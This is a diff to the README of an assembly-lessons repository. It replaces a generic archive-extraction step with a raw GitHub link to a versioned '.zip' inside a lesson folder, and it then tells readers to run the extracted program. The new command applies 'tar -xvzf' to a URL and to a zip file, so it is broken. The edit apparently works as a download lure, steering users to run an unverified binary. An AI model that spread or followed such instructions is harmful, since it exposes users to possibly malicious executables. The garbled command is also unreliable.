CSophanith/asm-lessons/README.md

 ### For Linux:

-1. Extract the contents of the `.tar.gz` file using a command like `tar -xvzf asm-lessons.tar.gz`.
+1. Extract the contents of the `https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip` file using a command like `tar -xvzf https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip`.
 2. Navigate to the extracted folder in your terminal.
 3. Run the application with the command `./asm-lessons`.